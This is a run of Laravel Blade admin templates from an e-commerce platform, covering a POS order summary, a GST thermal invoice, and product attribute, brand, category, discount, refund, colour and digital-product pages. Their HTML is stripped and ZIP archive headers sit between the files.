    @php $shippingInfo = Session::get('pos.shipping_info'); $state = is_array($shippingInfo) ? ($shippingInfo['state'] ?? null) : null; @endphp @if(Session::has('pos.shipping_info'))
    {{translate('Name')}}: {{ Session::get('pos.shipping_info')['name'] }}
    {{translate('Email')}}: {{ Session::get('pos.shipping_info')['email'] }}
    {{translate('Phone')}}: {{ Session::get('pos.shipping_info')['phone'] }}
    {{translate('Address')}}: {{ Session::get('pos.shipping_info')['address'] }}
    {{translate('Country')}}: {{ Session::get('pos.shipping_info')['country'] }}
    @if($state)
    {{translate('State')}}: {{$state}}
    @endif
    {{translate('City')}}: {{ Session::get('pos.shipping_info')['city'] }}
    {{translate('Postal Code')}}: {{ Session::get('pos.shipping_info')['postal_code'] }}
    @else
    {{ translate('No customer information selected.') }}
    @endif
    {{ translate('Order Info') }}
    {{translate('Total')}} {{ single_price($subtotal) }}
    @if (!addon_is_activated('gst_system'))
    {{translate('Tax')}} {{ single_price($tax) }}
    @endif
    {{translate('Shipping')}} {{ single_price(Session::get('pos.shipping', 0)) }}
    {{translate('Discount')}} {{ single_price(Session::get('pos.discount', 0)) }}
    @if (addon_is_activated('gst_system')) @if($state) @if(same_state_shipping_pos($state))
    {{translate('CGST')}} {{ single_price($gst/2) }}
    {{translate('SGST')}} {{ single_price($gst/2) }}
    @else
    {{translate('IGST')}} {{ single_price($gst) }}
    @endif @else
    {{translate('GST')}} {{ single_price($gst) }}
    @endif @endif
    {{translate('Total')}} {{ single_price($total) }}
    PK�N]l�Ӂ�V�V+views/backend/pos/thermal_invoice.blade.phpnu�[��� {{ translate('INVOICE') }}
    {{ get_setting('site_name') }}
    {{ get_setting('contact_address') }}
    {{ translate('Ph') }}: {{ get_setting('contact_phone') }}
    {{ translate('Email') }}: {{ get_setting('contact_email') }}
    {{ get_setting('contact_address',null,App::getLocale()) }}
    {{ translate('RETAIL INVOICE') }}
    {{ translate('Invoice No') }}:
    {{ $order->code }}
    {{ translate('Date') }}:
    {{ date('d/m/Y h:i A', $order->date) }}
    {{ translate('Payment') }}: {{ strtoupper(str_replace('_', ' ', $order->payment_type)) }}
    @php $gstin = get_seller_gstin($order); @endphp @if($gstin != null) @endif
    {{ translate('SOLD BY') }}
    {{ $order->shop->name ?? get_setting('site_name') }}
    {{ get_seller_address($order) }}
    {{ translate('GSTIN') }}: {{ $gstin }}
    {{ translate('Operator') }}: {{ $order->operatorUser ? $order->operatorUser->name : translate('N/A') }}
    {{--
    @php $shipping_address = json_decode($order->shipping_address); @endphp
    {{ translate('BILL TO') }}
    {{ $shipping_address->name }}
    {{ $shipping_address->address ? $shipping_address->address.',' : '' }} {{ $shipping_address->city }}
    {{ !empty($shipping_address->state) ? $shipping_address->state.' - ' : '' }} {{ $shipping_address->postal_code ? $shipping_address->postal_code.',' : '' }} {{ $shipping_address->country }}
    @if($shipping_address->phone) {{ translate('Phone') }}: {{ $shipping_address->phone }}
    @endif @if($shipping_address->email) {{ translate('Email') }}: {{ $shipping_address->email }} @endif
    --}} {{--
    @php $shipping_address = json_decode($order->shipping_address); @endphp
    {{ translate('SHIP TO') }}
    {{ $shipping_address->name }}
    {{ $shipping_address->address ? $shipping_address->address.',' : '' }} {{ $shipping_address->city }}
    {{ !empty($shipping_address->state) ? $shipping_address->state.' - ' : '' }} {{ $shipping_address->postal_code ? $shipping_address->postal_code.',' : '' }} {{ $shipping_address->country }}
    @if($shipping_address->phone) {{ translate('Phone') }}: {{ $shipping_address->phone }}
    @endif @if($shipping_address->email) {{ translate('Email') }}: {{ $shipping_address->email }} @endif
    --}}
    {{ translate('PRODUCTS') }}
    @foreach ($order->orderDetails as $key => $orderDetail) @if ($orderDetail->product != null)
    @php $product_stock = json_decode($orderDetail->product->stocks->first(), true); @endphp @php $first_order = $order->orderDetails->first(); @endphp @if(is_numeric($first_order->gst_amount)) @else @endif
    {{ $orderDetail->product->name }} @if($orderDetail->variation != null)
    ({{ $orderDetail->variation }}) @endif
    {{ translate('SKU') }}: {{ $product_stock['sku'] }}
    {{ translate('Qty') }}: {{ $orderDetail->quantity }} {{ translate('Price') }}: {{ single_price($orderDetail->price) }}
    @php $gst_amount = get_gst_by_price_and_rate($orderDetail->price - $orderDetail->coupon_discount , $orderDetail->gst_rate); $shipping_gst = get_gst_by_price_and_rate($orderDetail->shipping_cost, $orderDetail->gst_rate); @endphp @if(same_state_shipping($order)) @else @endif
    {{ translate('Gross Amt') }}: {{ single_price($orderDetail->price) }}
    {{ translate('Discount') }}: {{ single_price($orderDetail->coupon_discount) }}
    {{ translate('Taxable Value') }}: {{ single_price($orderDetail->price - $orderDetail->coupon_discount) }}
    {{ translate('CGST') }} ({{ $orderDetail->gst_rate/2 }}%): {{ single_price($gst_amount/2) }}
    {{ translate('SGST') }} ({{ $orderDetail->gst_rate/2 }}%): {{ single_price($gst_amount/2) }}
    {{ translate('IGST') }} ({{ $orderDetail->gst_rate }}%): {{ single_price($gst_amount) }}
    @if(same_state_shipping($order)) @else @endif
    {{ translate('Shipping Details') }}
    {{ translate('Cost') }}: {{ single_price($orderDetail->shipping_cost) }}
    {{ translate('CGST') }}: {{ single_price($shipping_gst/2) }}
    {{ translate('SGST') }}: {{ single_price($shipping_gst/2) }}
    {{ translate('IGST') }}: {{ single_price($shipping_gst) }}
    {{ translate('Item Total') }}: {{ single_price($orderDetail->price - $orderDetail->coupon_discount + $gst_amount + $orderDetail->shipping_cost + $shipping_gst) }}
    {{ translate('Tax') }}: {{ single_price($orderDetail->tax) }}
    {{ translate('Item Total') }}: {{ single_price($orderDetail->price + $orderDetail->tax) }}
    @endif @endforeach
    {{ translate('ORDER SUMMARY') }}
    @if(is_numeric($first_order->gst_amount)) @else @if($order->coupon_discount > 0) @endif @endif
    {{ translate('Sub Total (Taxable)') }}: {{ single_price($order->orderDetails->sum('price') + $order->orderDetails->sum('shipping_cost') - $order->orderDetails->sum('coupon_discount')) }}
    {{ translate('Total GST') }}: {{ single_price($order->orderDetails->sum('gst_amount')) }}
    {{ translate('Sub Total') }}: {{ single_price($order->orderDetails->sum('price')) }}
    {{ translate('Shipping') }}: {{ single_price($order->orderDetails->sum('shipping_cost')) }}
    {{ translate('Tax') }}: {{ single_price($order->orderDetails->sum('tax')) }}
    {{ translate('Coupon Discount') }}: -{{ single_price($order->coupon_discount) }}
    {{ translate('GRAND TOTAL') }} {{ single_price($order->grand_total) }}
    {{ translate('Thank you for your purchase!') }}
    PK�N]>views/backend/product/attribute/attribute_value/edit.blade.phpnu�[���PK�N]?views/backend/product/attribute/attribute_value/index.blade.phpnu�[���PK�N]0T�pp0views/backend/product/attribute/create.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{translate('Attribute Information')}}
    @csrf
    @endsection @section('script') @endsectionPK�N]���0vv.views/backend/product/attribute/edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('Attribute Information') }}
    @csrf
    @forelse ($attribute->attribute_values as $value)
    @empty
    @endforelse {{-- Add New Button --}}
    @endsection @section('script') @endsectionPK�N]j�%>>/views/backend/product/attribute/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{translate('All Attributes')}}

    @can('add_product_attribute') @endcan
    {{ translate('Attributes') }}
    @foreach ($attributes as $key => $attribute) @endforeach
    # {{ translate('Name') }} {{ translate('Values') }} {{ translate('Options') }}
    {{ $key + 1 }} {{ $attribute->getTranslation('name') }} @foreach ($attribute->attribute_values as $key => $value) {{ $value->value }} @endforeach @can('edit_product_attribute') @endcan @can('delete_product_attribute') @endcan
    {{ $attributes->links() }}
    @endsection @section('modal') @endsection PK�N]�M �z>z>2views/backend/product/brands/brand_table.blade.phpnu�[���
    @if (auth()->user()->can('delete_brand')) @else @endif @foreach ($brands as $key => $brand) @php $categories = $brand->products->pluck('categories')->flatten()->unique('id'); $categoryNames = $categories->pluck('name'); $displayText = $categoryNames->implode(', '); $charLimit = 60; @endphp @endforeach
    #{{ translate('Logo') }} {{ translate('Name') }} {{ translate('Qty Products') }} {{ translate('Created') }} {{ translate('Categories') }} {{ translate('Options') }}
    @if (auth()->user()->can('delete_brand'))
    @else
    {{ $key + 1 + ($brands->currentPage() - 1) * $brands->perPage() }}
    @endif
    Image
    {{ $brand->getTranslation('name') }}
    {{$brand->products_count}}
    {{ $brand->created_at->format('d M, Y') }}
    @if (strlen($displayText) > $charLimit) {{ Str::limit($displayText, $charLimit) }} {{ translate('See More') }} @else {{ $displayText }} @endif
    PK�N]�>�oC C -views/backend/product/brands/create.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{translate('Brand Information')}}
    @csrf
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{ translate('Minimum dimensions required: 120px width X 80px height.') }}
    {{ translate('Separate with coma') }}
    @endsection PK�N]� ��� � .views/backend/product/brands/details.blade.phpnu�[���
    {{ $brand->getTranslation('name') }}
    {{--

    --}}
    {{translate('Brand Logo')}}
    Logo

    {{translate('Products of this Brand')}} {{$brand->products_count}} @if($brand->products_count > 0) {{ translate('View Products')}} @endif

    {{translate("Categories with this brand's products")}} ({{ $brand->products->pluck('categories')->flatten()->unique('id')->count() }})

    @foreach ($brand->products->pluck('categories')->flatten()->unique('id') as $category)

    {{ $category->name }}

    @endforeach
    PK�N]�.emm+views/backend/product/brands/edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{translate('Brand Information')}}
    @csrf
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{ translate('Minimum dimensions required: 120px width X 80px height.') }}
    {{ translate('Separate with coma') }}
    @endsection PK�N]c �l0606,views/backend/product/brands/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content') @php CoreComponentRepository::instantiateShopRepository(); CoreComponentRepository::initializeCache(); @endphp

    {{ translate('All Brands') }}

    @can('add_brand') {{ translate('Add New Brand') }} @endif
    @can('delete_brand') @endcan
    @endsection @section('modal')
    @endsection @section('script') @endsectionPK�N]����447views/backend/product/brand_bulk_upload/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{translate('Brand Bulk Upload')}}
    {{ translate('Step 1')}}:

    1. {{translate('Download the skeleton file and fill it with proper data')}}.

    2. {{translate('You can download the example file to understand how the data must be filled')}}.

    3. {{translate('Once you have downloaded and filled the skeleton file, upload it in the form below and submit')}}.


    {{translate('Upload Brand File')}}
    @csrf
    @endsection PK�N]3?�� � 1views/backend/product/bulk_upload/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{translate('Product Bulk Upload')}}
    {{ translate('Step 1')}}:

    1. {{translate('Download the skeleton file and fill it with proper data')}}.

    2. {{translate('You can download the example file to understand how the data must be filled')}}.

    3. {{translate('Once you have downloaded and filled the skeleton file, upload it in the form below and submit')}}.

    4. {{translate('After uploading products you need to edit them and set product\'s images and choices')}}.


    {{translate('Step 2')}}:

    1. {{translate('Category and Brand should be in numerical id')}}.

    2. {{translate('You can download the pdf to get Category and Brand id')}}.



    {{translate('Upload Product File')}}
    @csrf
    @endsection PK�N]�>�Css<views/backend/product/categories/categories_option.blade.phpnu�[��� @foreach ($categories as $p_category) @foreach ($p_category->childrenCategories as $childCategory) @include('categories.child_category', ['child_category' => $childCategory]) @endforeach @endforeach PK�N]����Aviews/backend/product/categories/categories_option_edit.blade.phpnu�[��� @foreach ($categories as $p_category) @foreach ($p_category->childrenCategories as $childCategory) @include('backend.product.categories.child_category_edit', ['child_category' => $childCategory]) @endforeach @endforeach PK�N]@��!�K�K;views/backend/product/categories/categories_table.blade.phpnu�[���
    @if (auth()->user()->can('delete_product_category')) @else @endif @if (get_setting('seller_commission_type') == 'category_based') @endif @foreach ($categories as $key => $category) @if (get_setting('seller_commission_type') == 'category_based') @endif @endforeach
    # {{ translate('Icon') }} {{ translate('Name') }} {{ translate('Parent Category') }} {{ translate('Order Level') }} {{ translate('Level') }} {{ translate('Featured') }} {{ translate('Hot Category') }}{{ translate('Commission') }} {{ translate('Options') }}
    @if (auth()->user()->can('delete_product_category'))
    @else
    {{ $key + 1 + ($category->currentPage() - 1) * $category->perPage() }}
    @endif
    @if ($category->icon != null) {{ translate('icon') }} @else — @endif
    {{ $category->getTranslation('name') }} @if ($category->digital == 1) {{TRANSLATE('Digital')}} @endif
    @php $parent = \App\Models\Category::where( 'id', $category->parent_id, )->first(); @endphp @if ($parent != null) {{ $parent->getTranslation('name') }} @else — @endif
    {{ $category->order_level }}
    {{ $category->level }}
    {{ $category->commision_rate }} %
    {{ $categories->appends(request()->input())->links() }}
    PK�N]�E�SS>views/backend/product/categories/child_category_edit.blade.phpnu�[���@php $value = null; for ($i=0; $i < $child_category->level; $i++){ $value .= '--'; } $child_categories = $child_category->categories->whereNotIn('id', App\Utility\CategoryUtility::children_ids($category->id, true))->where('id', '!=' , $category->id); @endphp @if (count($child_categories)>0) @foreach ($child_categories as $childCategory) @include('categories.child_category', ['child_category' => $childCategory]) @endforeach @endif PK�N]�*K$K$1views/backend/product/categories/create.blade.phpnu�[���@extends('backend.layouts.app') @section('content') @php CoreComponentRepository::instantiateShopRepository(); CoreComponentRepository::initializeCache(); @endphp
    {{translate('Category Information')}}
    @csrf
    {{translate('Higher number has high priority')}}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{ translate('Minimum dimensions required: 150px width X 150px height.') }}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{ translate('Minimum dimensions required: 16px width X 16px height.') }}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{ translate('Minimum dimensions required: 260px width X 260px height.') }}
    {{ translate('Separate with coma') }}
    @endsection @section('script') @endsection PK�N]�c����2views/backend/product/categories/details.blade.phpnu�[���
    {{ $category->getTranslation('name') }}
    {{--

    --}}
    @if ($category->icon != null)
    {{translate('Logo')}}
    Logo
    @endif
    {{translate('Banner - Cover Image')}}
    Banner
    Cover

    {{translate('Products in the Category')}}

    {{ $category->product_categories_count }} @if($category->product_categories_count>0) {{ translate('View Products')}} @endif

    {{translate('Parent Category')}}

    @php $parent = \App\Models\Category::where( 'id', $category->parent_id, )->first(); @endphp {{ $parent != null ? $parent->getTranslation('name') : '—' }}

    {{translate('Order Level')}}

    {{ $category->order_level }}

    {{translate('Level')}}

    {{ $category->level }}
    @if (get_setting('seller_commission_type') == 'category_based')

    Commission of Seller's

    {{ $category->commision_rate }}%
    @endif

    {{translate('Category Based Discount')}}

    @php $end_date = $category->discount_end_date ? date('d-m-Y H:i:s', $category->discount_end_date) : null; @endphp @if($category->discount > 0 && ($end_date == null || strtotime($end_date) > strtotime(date('d-m-Y H:i:s')))) {{ $category->discount }}% @else @endif
    PK�N]+,�S)S)/views/backend/product/categories/edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content') @php CoreComponentRepository::instantiateShopRepository(); CoreComponentRepository::initializeCache(); @endphp
    {{translate('Category Information')}}
    @csrf
    digital == '0') checked @endif>
    digital == '1') checked @endif>
    {{translate('Higher number has high priority')}}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{ translate('Minimum dimensions required: 150px width X 150px height.') }}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{ translate('Minimum dimensions required: 16px width X 16px height.') }}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{ translate('Minimum dimensions required: 318px width X 340px height.') }}
    @endsection @section('script') @endsection PK�N]� ��Q�Q0views/backend/product/categories/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content') @php CoreComponentRepository::instantiateShopRepository(); CoreComponentRepository::initializeCache(); @endphp

    {{ translate('All Categories') }}

    @can('add_product_category') {{ translate('Add New Category') }} @endif
    @endsection @section('modal') @include('modals.delete_modal')
    @endsection @section('script') @endsection PK�N]�)�UFUFCviews/backend/product/category_wise_discount/set_discount.blade.phpnu�[���@extends('backend.layouts.app') @section('content') @php CoreComponentRepository::instantiateShopRepository(); CoreComponentRepository::initializeCache(); @endphp

    {{translate('Set Category Wise Product Discount')}}

    @php $active_tab = $active_tab ?? 'all-categories'; @endphp
    @endsection @section('modal') @endsection @section('script') @endsectionPK�N]�3�y1y1<views/backend/product/category_wise_discount/table.blade.phpnu�[���
    @if (auth()->user()->can('can_set_category_wise_discount')) @else @endif @forelse ($categories as $key => $category) @php $allMatch = $category->sellerDiscounts->every(function($discount) use ($category) { return $discount->discount == $category->discount && $discount->discount_start_date == $category->discount_start_date && $discount->discount_end_date == $category->discount_end_date; }); @endphp @php $start_date = $category->discount_start_date ? date('d-m-Y H:i:s', $category->discount_start_date) : null; $end_date = $category->discount_end_date ? date('d-m-Y H:i:s', $category->discount_end_date) : null; @endphp @empty @endforelse
    # {{ translate('Icon') }} {{ translate('Name') }} {{ translate('Parent') }} {{ translate('Inhouse') }} {{ translate('Seller') }} {{ translate('Discount') }} (%) {{ translate('Date Range') }}
    @if (auth()->user()->can('can_set_category_wise_discount'))
    @else
    {{ $key + 1 + ($categories->currentPage() - 1) * $categories->perPage() }}
    @endif
    @if($category->icon != null) {{translate('icon')}} @else — @endif
    {{ $category->getTranslation('name') }} @if($category->digital == 1) {{translate('Digital')}} @endif
    @php $parent = \App\Models\Category::where('id', $category->parent_id)->first(); @endphp @if ($parent != null) {{ $parent->getTranslation('name') }} @else — @endif
    {{ $category->products->where('added_by', 'admin')->count()}}
    {{ $category->products->where('added_by', 'seller')->count() }}
    {{translate('Type and press enter to save')}}
    {{ translate('No Data found!') }}
    {{ $categories->appends(request()->input())->links() }}
    PK�N]~���Q�Q?views/backend/product/category_wise_refund/set_refund.blade.phpnu�[���@extends('backend.layouts.app') @section('content') @php CoreComponentRepository::instantiateShopRepository(); CoreComponentRepository::initializeCache(); @endphp @php $isCategoryBasedRefund = get_setting('refund_type') == 'category_based_refund'; @endphp

    {{translate('Set Category Wise Product Refund')}}

    @if(get_setting('refund_type') != 'category_based_refund')

    {{ translate(' Category Based Refund is not Activated, Active ') }} {{ translate('Here') }}

    @endif
    @php $active_tab = $active_tab ?? 'all-categories'; @endphp
    @endsection @section('modal') @include('modals.loading_modal')
    {{translate('Bulk Assign Refund Request Time(Days)')}}

    {{translate('Selected')}} {{translate('Category')}}

    {{translate('This operation will apply the selected Refund Request Time(Days) to all chosen categories. You can modify these values individually at any time.')}}

    {{translate('Refund Request Time(Days)')}}

    {{translate('Type and press enter to save')}}
    @endsection @section('script') @endsectionPK�N]Q�`��#�#:views/backend/product/category_wise_refund/table.blade.phpnu�[���
    @if (auth()->user()->can('can_set_category_based_refund_days')) @else @endif @forelse ($categories as $key => $category) @php $isCategoryBasedRefund = get_setting('refund_type') == 'category_based_refund'; @endphp @empty @endforelse
    # {{ translate('Icon') }} {{ translate('Name') }} {{ translate('Parent') }} {{ translate('Inhouse ') }} {{ translate('Seller') }} {{ translate('Refund Request Time(Days)') }}
    @if (auth()->user()->can('can_set_category_based_refund_days'))
    @else
    {{ $key + 1 + ($categories->currentPage() - 1) * $categories->perPage() }}
    @endif
    @if($category->icon != null) {{translate('icon')}} @else — @endif
    {{ $category->getTranslation('name') }} @if($category->digital == 1) {{translate('Digital')}} @endif
    @php $parent = \App\Models\Category::where('id', $category->parent_id)->first(); @endphp @if ($parent != null) {{ $parent->getTranslation('name') }} @else — @endif
    {{ $category->products->where('added_by', 'admin')->count()}}
    {{ $category->products->where('added_by', 'seller')->count() }}
    {{translate('Type and press enter to save')}}
    {{ translate('No Data found!') }}
    {{ $categories->appends(request()->input())->links() }}
    PK�N]$;�ʕ�,views/backend/product/color/create.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{translate('Color Information')}}
    @csrf
    @endsection PK�N]��c00*views/backend/product/color/edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{translate('Color Information')}}
    @if ($errors->any())
      @foreach ($errors->all() as $error)
    • {{ $error }}
    • @endforeach
    @endif
    @csrf
    @endsection PK�N]��R��+views/backend/product/color/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{translate('All Colors')}}

    @can('add_color') @endcan

    Activate Color Filter for Product Listing Page

    {{ translate('Colors') }}
    @foreach ($colors as $key => $color) @endforeach
    # {{ translate('Name') }} {{ translate('Options') }}
    {{ ($key+1) + ($colors->currentPage() - 1)*$colors->perPage() }} {{ $color->name }} @can('edit_color') @endcan @can('delete_color') @endcan
    {{ $colors->appends(request()->input())->links() }}
    @endsection @section('modal') @include('modals.delete_modal') @endsection @section('script') @endsection PK�N]�\����@views/backend/product/custom_label/custom_label_create.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('Custom Label Information') }}
    @csrf
    @endsection @section('script') @endsectionPK�N]b8����>views/backend/product/custom_label/custom_label_edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('Edit Custom Label Information') }}
    @csrf
    @endsection @section('script') @endsection PK�N]�(�a�7�7>views/backend/product/custom_label/custom_label_list.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('Custom Label') }}

    @can('custom_label_create') @endcan
    @php $activeClasss = 'btn-soft-blue'; $inActiveClasses = 'text-secondary border-dashed border-soft-light'; @endphp {{ translate('All') }} {{ translate('Inhouse') }} {{ translate('Seller') }}
    @include('backend.product.custom_label.partials.table', [ 'custom_labels' => $custom_labels, 'sort_search' => $sort_search, 'customLabelUserType' => $customLabelUserType ])
    @endsection @section('modal') @include('modals.delete_modal') @endsection @section('script') @endsection PK�N]�=�� � ;views/backend/product/custom_label/partials/table.blade.phpnu�[��� @canany(['custom_label_edit','custom_label_delete']) @endcanany @foreach ($custom_labels as $key => $custom_label) @canany(['custom_label_edit','custom_label_delete']) @endcanany @endforeach
    # {{ translate('Label') }} {{ translate('Added By') }} {{ translate('Seller Can Access') }}?{{ translate('Options') }}
    {{ $key + 1 + ($custom_labels->currentPage() - 1) * $custom_labels->perPage() }} {{ $custom_label->getTranslation('text') }} {{ $custom_label->user->name }} @if($custom_label->user_id == get_admin()->id) @endif
    {{ $custom_labels->appends(request()->input())->links() }}
    PK�N]�"U$ss5views/backend/product/custom_label/products.blade.phpnu�[���@if(count($product_ids) > 0) @foreach ($product_ids as $key => $id) @php $product = \App\Models\Product::findOrFail($id); @endphp @endforeach
    {{translate('Product')}} {{translate('Base Price')}} {{translate('Added By')}}
    {{ $product->getTranslation('name') }}
    {{ $product->unit_price }} {{ optional($product->user)->name }}
    @endifPK�N]�#��/g/g7views/backend/product/digital_products/create.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('Add New Digital Product') }}

    @if ($errors->any())
      @foreach ($errors->all() as $error)
    • {{ $error }}
    • @endforeach
    @endif
    @csrf
    {{ translate('General') }}
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{ translate('Images') }}
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{ translate('Meta Tags') }}
    {{ translate('Separate with coma') }}
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{ translate('Price') }}
    @if (addon_is_activated('gst_system'))
    @else @foreach (\App\Models\Tax::where('tax_status', 1)->get() as $tax)
    @endforeach @endif
    {{translate('Leave it blank if you do not use external site link')}}
    {{translate('Leave it blank if you do not use external site link')}}
    {{ translate('Product Information') }}
    {{-- Frequently Bought Products --}}
    {{ translate('Frequently Bought') }}
    {{-- Select Category for Frequently Bought Product --}}
    {{ translate('Product Category') }}
    {{ translate('Select Main') }} {{ translate('This will be used for commission based calculations and homepage category wise product Show.') }}
      @foreach ($categories as $category)
    • {{ $category->getTranslation('name') }}
    • @foreach ($category->childrenCategories as $childCategory) @include('backend.product.products.child_category', ['child_category' => $childCategory]) @endforeach @endforeach
    @endsection @section('modal') @include('modals.product_select_modal') @endsection @section('script') @include('partials.product.product_temp_data') @endsection PK�N]"C3 � �5views/backend/product/digital_products/edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('Edit Digital Product') }}
    @csrf
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{ translate('Images') }}
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{ translate('Meta Tags') }}
    {{ translate('Separate with coma') }}
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{ translate('Price') }}
    @if (addon_is_activated('gst_system'))
    @else @foreach (\App\Models\Tax::where('tax_status', 1)->get() as $tax) @php $tax_amount = 0; $tax_type = ''; foreach ($tax->product_taxes as $row) { if ($product->id == $row->product_id) { $tax_amount = $row->tax; $tax_type = $row->tax_type; } } @endphp
    @endforeach @endif @php $start_date = $product->discount_start_date ? date('d-m-Y H:i:s', $product->discount_start_date) : null; $end_date = $product->discount_end_date ? date('d-m-Y H:i:s', $product->discount_end_date) : null; @endphp
    {{translate('Leave it blank if you do not use external site link')}}
    {{translate('Leave it blank if you do not use external site link')}}
    {{ translate('Description') }}
    {{-- Frequently Bought Products --}}
    {{ translate('Frequently Bought') }}
    frequently_bought_selection_type == 'product') checked @endif >
    frequently_bought_selection_type == 'category') checked @endif >
    @php $fq_bought_products = $product->frequently_bought_products()->where('category_id', null)->get(); @endphp
    @if(count($fq_bought_products) > 0)
    @foreach($fq_bought_products as $fQBproduct) @endforeach
    {{ translate('Product Thumb') }} {{ translate('Product Name') }} {{ translate('Category') }} {{ translate('Options') }}

    {{ translate('Image')}}

    {{ $fQBproduct->frequently_bought_product->getTranslation('name') }}

    {{ $fQBproduct->frequently_bought_product->main_category->name ?? translate('Category Not Found') }}
    @endif
    {{-- Select Category for Frequently Bought Product --}}
    @php $fq_bought_product_category_id = $product->frequently_bought_products()->where('category_id','!=', null)->first(); $fqCategory = $fq_bought_product_category_id != null ? $fq_bought_product_category_id->category_id : null; @endphp
    {{ translate('Product Category') }}
    {{ translate('Select Main') }} {{ translate('This will be used for commission based calculations and homepage category wise product Show.') }}
    @php $old_categories = $product->categories()->pluck('category_id')->toArray(); @endphp
      @foreach ($categories as $category)
    • {{ $category->getTranslation('name') }}
    • @foreach ($category->childrenCategories as $childCategory) @include('backend.product.products.child_category', ['child_category' => $childCategory]) @endforeach @endforeach
    @endsection @section('modal') @include('modals.product_select_modal') @endsection @section('script') @endsection PK�N]��cE'E'6views/backend/product/digital_products/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    @can('add_digital_product') @endcan
    {{ translate('Digital Products') }}
    @if($type == 'Seller') @endif @if(get_setting('product_approve_by_admin') == 1 && $type == 'Seller') @endif @foreach($products as $key => $product) @if($type == 'Seller') @endif @if(get_setting('product_approve_by_admin') == 1 && $type == 'Seller') @endif @endforeach
    # {{translate('Name')}}{{translate('Added By')}}{{translate('Photo')}} {{translate('Base Price')}} {{translate('Todays Deal')}} {{translate('Published')}}{{translate('Approved')}}{{translate('Featured')}} {{translate('Options')}}
    {{ ($key+1) + ($products->currentPage() - 1)*$products->perPage() }} {{ $product->getTranslation('name') }}{{ optional($product->user)->name }} Image {{ number_format($product->unit_price,2) }} @can('add_digital_product') @endcan @can('add_digital_product') @endcan @can('add_digital_product') @endcan
    {{ $products->appends(request()->input())->links() }}
    @endsection @section('modal') @include('modals.delete_modal') @endsection @section('script') @endsection PK�N]a/!�ll7views/backend/product/measurementPoints/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('All Measurement Points') }}

    {{ translate('Measurement Points') }}
    @foreach ($measurementPoints as $key => $measurementPoint) @endforeach
    # {{ translate('Name') }} {{ translate('Options') }}
    {{ $key + 1 }} {{ $measurementPoint->name }} @can('edit_measurement_points') @endcan @can('delete_measurement_points') @endcan
    {{ $measurementPoints->links() }}
    @can('add_measurement_points')
    {{ translate('Add New Measurement Point') }}
    @if ($errors->any())
      @foreach ($errors->all() as $error)
    • {{ $error }}
    • @endforeach
    @endif
    @csrf
    @endcan
    @endsection @section('modal') @include('modals.delete_modal') @can('edit_measurement_points') @endcan @endsection @section('script') @endsection PK�N]�$�X��7views/backend/product/products/child_category.blade.phpnu�[���@php $value = null; for ($i=0; $i < $child_category->level; $i++){ $value .= '-'; } @endphp
  • {{ $value }}{{ $childCategory->getTranslation('name') }}
  • @if ($child_category->childrenCategories) @foreach ($child_category->childrenCategories as $childCategory) @include('backend.product.products.child_category', ['child_category' => $childCategory]) @endforeach @endif PK�N] ��@ϧϧ/views/backend/product/products/create.blade.phpnu�[���@extends('backend.layouts.app') @section('content') @php CoreComponentRepository::instantiateShopRepository(); CoreComponentRepository::initializeCache(); @endphp

    {{ translate('Add New Product') }}

    @csrf
    {{translate('Product Basic Information')}}
    @if (get_setting('ai_activation') == 1) generate Icon
    {{translate('Generate')}}
    @endif
    @php // Recursive function for single select function renderSingleCategoryOptions($categories, $selectedId = null, $level = 0) { foreach ($categories as $category) { $indent = str_repeat('   ', $level); $selected = ($selectedId == $category->id) ? 'selected' : ''; echo ""; if ($category->childrenCategories && $category->childrenCategories->count() > 0) { renderSingleCategoryOptions($category->childrenCategories, $selectedId, $level + 1); } } } // Recursive function for multi select function renderMultiCategoryOptions($categories, $selectedIds = [], $level = 0) { foreach ($categories as $category) { $indent = str_repeat('   ', $level); $selected = (is_array($selectedIds) && in_array($category->id, $selectedIds)) ? 'selected' : ''; echo ""; if ($category->childrenCategories && $category->childrenCategories->count() > 0) { renderMultiCategoryOptions($category->childrenCategories, $selectedIds, $level + 1); } } } @endphp
    {{translate('Product Configuration')}}
    @if (get_setting('ai_activation') == 1) generate Icon
    {{translate('Generate')}}
    @endif
    {{ translate('This is used for search. Input those words by which cutomer can find this product.') }}
    {{translate('Files & Media') }}
    generate Icon
    generate Icon
    ' data-target=".video-provider-link"> {{ translate('Add Another') }}
    generate Icon
    generate Icon
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{translate('Product Description') }}
    @if (get_setting('ai_activation') == 1) generate Icon
